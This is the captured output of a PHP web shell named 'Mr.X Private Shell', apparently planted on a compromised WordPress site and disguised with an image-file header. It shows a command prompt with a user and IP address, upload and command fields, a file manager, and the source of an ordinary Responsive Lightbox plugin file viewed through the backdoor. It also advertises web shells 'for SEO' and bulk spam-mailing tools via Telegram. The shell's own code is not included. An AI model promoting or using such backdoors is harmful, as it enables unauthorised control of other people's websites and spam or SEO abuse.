����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

deexcl@216.73.217.71: ~ $
<?php
/**
 * Responsive Lightbox public functions
 *
 * Functions available for users and developers. May not be replaced.
 *
 * @since 2.0
 */
if ( ! defined( 'ABSPATH' ) )
	exit;

/**
 * Display gallery using shortcode.
 *
 * @param array $args Shortcode arguments
 * @return void
 */
function rl_gallery( $args = [] ) {
	$defaults = [
		'id' => 0
	];

	// merge defaults with arguments
	$args = array_merge( $defaults, $args );

	// parse id
	$args['id'] = (int) $args['id'];

	// is it gallery?
	if ( get_post_type( $args['id'] ) === 'rl_gallery' )
		echo do_shortcode( '[rl_gallery id="' . (int) $args['id'] . '"]' );
	else
		echo '[rl_gallery id="' . (int) $args['id'] . '"]';
}

/**
 * Get gallery shortcode images - wrapper.
 *
 * @param array $args Gallery arguments
 * @return array
 */
function rl_get_gallery_shortcode_images( $args ) {
	return Responsive_Lightbox()->frontend->get_gallery_shortcode_images( $args );
}

/**
 * Get gallery fields - wrapper.
 *
 * @param string $type Gallery type
 * @return array
 */
function rl_get_gallery_fields( $type ) {
	return Responsive_Lightbox()->frontend->get_gallery_fields( $type );
}

/**
 * Get gallery fields combined with shortcode attributes - wrapper.
 *
 * @param array $fields Gallery fields
 * @param array $shortcode_atts Gallery shortcode attributes
 * @param bool $gallery Whether is it rl_gallery shortcode
 * @return array
 */
function rl_get_gallery_fields_atts( $fields, $shortcode_atts, $gallery = true ) {
	return Responsive_Lightbox()->frontend->get_gallery_fields_atts( $fields, $shortcode_atts, $gallery );
}

/**
 * Get gallery images - wrapper.
 *
 * @param int $gallery_id Gallery ID
 * @param array $args Gellery args
 * @return array
 */
function rl_get_gallery_images( $gallery_id, $args ) {
	if ( did_action( 'init' ) )
		return Responsive_Lightbox()->galleries->get_gallery_images( $gallery_id, $args );
	else
		return [];
}

/**
 * Add lightbox to images, galleries and videos.
 *
 * @param string $content HTML content
 * @return string
 */
function rl_add_lightbox( $content ) {
	return Responsive_Lightbox()->frontend->add_lightbox( $content );
}

/**
 * Get attachment id by URL.
 * 
 * @param string $url Image URL
 * @return int
 */
function rl_get_attachment_id_by_url( $url ) {
	return Responsive_Lightbox()->frontend->get_attachment_id_by_url( $url );
}

/**
 * Get image size by URL.
 *
 * @param string $url Image URL
 * @return array
 */
function rl_get_image_size_by_url( $url ) {
	return Responsive_Lightbox()->frontend->get_image_size_by_url( $url );
}

/**
 * Get current lightbox script.
 *
 * @return string
 */
function rl_get_lightbox_script() {
	return Responsive_Lightbox()->get_lightbox_script();
}

/**
 * Set current lightbox script.
 *
 * @return bool
 */
function rl_set_lightbox_script( $script ) {
	return Responsive_Lightbox()->set_lightbox_script( $script );
}

/**
 * Check whether lightbox supports specified type.
 *
 * @param string|array $type Lightbox support type(s), leave empty to get all supported features
 * @param string $compare_mode
 * @return bool|array
 */
function rl_current_lightbox_supports( $type = '', $compare_mode = 'AND' ) {
	// get main instance
	$rl = Responsive_Lightbox();

	// get current script
	$script = $rl->get_lightbox_script();

	// get scripts
	$scripts = $rl->settings->scripts;

	// valid script?
	if ( array_key_exists( $script, $scripts ) && array_key_exists( 'supports', $scripts[$script] ) ) {
		if ( ! empty( $type ) ) {
			// multitype?
			if ( is_array( $type ) ) {
				// filter types
				$type = array_filter( $type );

				if ( empty( $type ) )
					return false;

				$supports = ( $compare_mode === 'AND' );

				foreach ( $type as $_type ) {
					// single type required
					if ( $compare_mode === 'OR' ) {
						if ( in_array( $_type, $scripts[$script]['supports'], true ) )
							return true;
					// all types required
					} else {
						if ( ! in_array( $_type, $scripts[$script]['supports'], true ) )
							return false;
					}
				}

				return $supports;
			// single type
			} else
				return in_array( $type, $scripts[$script]['supports'], true );
		// return all supported features
		} else
			return $scripts[$script]['supports'];
	}

	return false;
}

Filemanager

Name Type Size Permission Actions
providers Folder 0755
class-fast-image.php File 4.09 KB 0644
class-folders-walker.php File 2.4 KB 0644
class-folders.php File 41.62 KB 0644
class-frontend.php File 90.25 KB 0644
class-galleries.php File 175.14 KB 0644
class-multilang.php File 9.31 KB 0644
class-remote-library-api.php File 6.7 KB 0644
class-remote-library.php File 16.26 KB 0644
class-settings.php File 111.58 KB 0644
class-tour.php File 15.58 KB 0644
class-welcome.php File 6.08 KB 0644
class-widgets.php File 27.42 KB 0644
functions.php File 4.32 KB 0644